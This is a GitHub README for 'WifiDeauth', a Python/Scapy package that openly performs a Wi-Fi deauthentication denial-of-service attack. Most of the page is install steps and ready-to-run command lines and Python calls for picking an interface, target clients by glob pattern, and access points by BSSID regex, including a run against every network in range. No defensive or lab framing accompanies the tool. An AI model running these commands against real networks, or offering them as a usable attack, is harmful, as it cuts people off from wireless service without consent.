Skip to content

This package implement a Dos attack on Wifi named Deauth.

License

Notifications You must be signed in to change notification settings

mauricelambert/WifiDeauth

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

WifiDeauth

Description

This package implement a Dos attack on Wifi (protocol: 802.11) named Deauth.

Requirements

This package require :

  • python3
  • python3 Standard Library
  • Scapy

Installation

pip install WifiDeauth

Examples

Command lines

WifiDeauth -h
WifiDeauth --help
WifiDeauth -vvvvv # max verbose level
WifiDeauth -i "wlan0" # use specific interface
WifiDeauth -t "0A*" # using glob syntax to define targets
WifiDeauth -b "^([a-fA-F0-9]{2}:?){6}$" # using regex syntax to define BSSID

Python3

from WifiDeauth import WifiDeauth
deauth = WifiDeauth(targets="0A*", bssid="^([a-fA-F0-9]{2}:?){6}$", interface="wlan0", debug=5)
deauth.sniff()

Python executable:

python3 -m pip install scapy # install requirements
python3 WifiDeauth.pyz -vvvvv

# OR
python3 -m pip install scapy # install requirements
chmod u+x WifiDeauth.pyz # add execute rights
./WifiDeauth.pyz -b "*" # execute file

Python module (command line):

python3 -m WifiDeauth
python3 -m WifiDeauth.WifiDeauth -i "wlan0"

Links

Licence

Licensed under the GPL, version 3.

Releases

No releases published

Packages

No packages published

Languages